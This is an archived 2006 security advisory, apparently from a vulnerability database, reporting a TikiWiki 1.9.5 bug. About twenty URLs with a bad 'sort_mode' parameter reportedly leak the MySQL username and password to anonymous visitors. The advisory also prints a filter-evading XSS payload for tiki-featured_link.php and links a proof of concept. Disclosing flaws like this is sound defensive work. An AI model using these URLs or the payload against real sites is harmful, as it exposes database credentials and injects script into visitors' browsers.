tikiwiki 1.9.5 mysql password disclosure & xss

2006-11-02T00:00:00

Description

/*==========================================*/ //tikiwiki version 1.9.5 (CVS) -Sirius- (PoC) // Product: Tikiwiki // URL: http://tikiwiki.org/ // RISK: critical /*==========================================*/ there's a critical security bug in tikiwiki version 1.9.5 (CVS) -Sirius- a anonymous user , can dump the mysql user & passwd just by creating a mysql error with the "sort_mode" var , with those following links : /tiki-listpages.php?offset=0&sort_mode= /tiki-lastchanges.php?days=1&offset=0&sort_mode= /messu-archive.php?sort_mode= /messu-mailbox.php?sort_mode= /messu-sent.php?sort_mode= /tiki-directory_add_site.php?sort_mode= /tiki-directory_ranking.php?sort_mode= /tiki-directory_search.php?sort_mode= /tiki-forums.php?sort_mode= /tiki-view_forum.php?forumId= /tiki-friends.php?sort_mode= /tiki-list_blogs.php?sort_mode= /tiki-list_faqs.php?sort_mode= /tiki-list_trackers.php?sort_mode= /tiki-list_users.php?sort_mode= /tiki-my_tiki.php?sort_mode= /tiki-notepad_list.php?sort_mode= /tiki-orphan_pages.php?sort_mode= /tiki-shoutbox.php?sort_mode= /tiki-usermenu.php?sort_mode= /tiki-webmail_contacts.php?sort_mode= a proof of concept is disponible here : http://cockor.free.fr/PoC.swf there's also a xss here : /tiki-featured_link.php?type=f&url=" ></iframe><scr</script>ipt>alert('XSS')</scri</script>pt> <!-- regards , securfrog

{"id": "SECURITYVULNS:DOC:14896", "bulletinFamily": "software", "title": "tikiwiki 1.9.5 mysql password disclosure & xss", "description": "/*==========================================*/\r\n//tikiwiki version 1.9.5 (CVS) -Sirius- (PoC)\r\n// Product: Tikiwiki \r\n// URL: http://tikiwiki.org/\r\n// RISK: critical\r\n/*==========================================*/\r\n\r\n\r\n\r\n\r\nthere's a critical security bug in tikiwiki version 1.9.5 (CVS) -Sirius-\r\na anonymous user , can dump the mysql user & passwd just by creating a mysql error with the "sort_mode" var , with those following links :\r\n/tiki-listpages.php?offset=0&sort_mode=\r\n/tiki-lastchanges.php?days=1&offset=0&sort_mode=\r\n/messu-archive.php?sort_mode=\r\n/messu-mailbox.php?sort_mode=\r\n/messu-sent.php?sort_mode=\r\n/tiki-directory_add_site.php?sort_mode=\r\n/tiki-directory_ranking.php?sort_mode=\r\n/tiki-directory_search.php?sort_mode=\r\n/tiki-forums.php?sort_mode=\r\n/tiki-view_forum.php?forumId=\r\n/tiki-friends.php?sort_mode=\r\n/tiki-list_blogs.php?sort_mode=\r\n/tiki-list_faqs.php?sort_mode=\r\n/tiki-list_trackers.php?sort_mode=\r\n/tiki-list_users.php?sort_mode=\r\n/tiki-my_tiki.php?sort_mode=\r\n/tiki-notepad_list.php?sort_mode=\r\n/tiki-orphan_pages.php?sort_mode=\r\n/tiki-shoutbox.php?sort_mode=\r\n/tiki-usermenu.php?sort_mode=\r\n/tiki-webmail_contacts.php?sort_mode=\r\n\r\na proof of concept is disponible here : http://cockor.free.fr/PoC.swf\r\n\r\nthere's also a xss here :\r\n/tiki-featured_link.php?type=f&url=" ></iframe><scr</script>ipt>alert('XSS')</scri</script>pt> <!--\r\n\r\nregards , securfrog ", "published": "2006-11-02T00:00:00", "modified": "2006-11-02T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:14896", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:19", "edition": 1, "viewCount": 1234, "enchantments": {"score": {"value": -0.4, "vector": "NONE"}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:6768"]}], "rev": 4}, "backreferences": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:6768"]}]}, "exploitation": null, "vulnersScore": -0.4}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645411895, "score": 1659803227}, "_internal": {"score_hash": "8c287a43815344f1fa9a7e6c86991d52"}}

tikiwiki 1.9.5 mysql password disclosure &amp; xss

Description

tikiwiki 1.9.5 mysql password disclosure & xss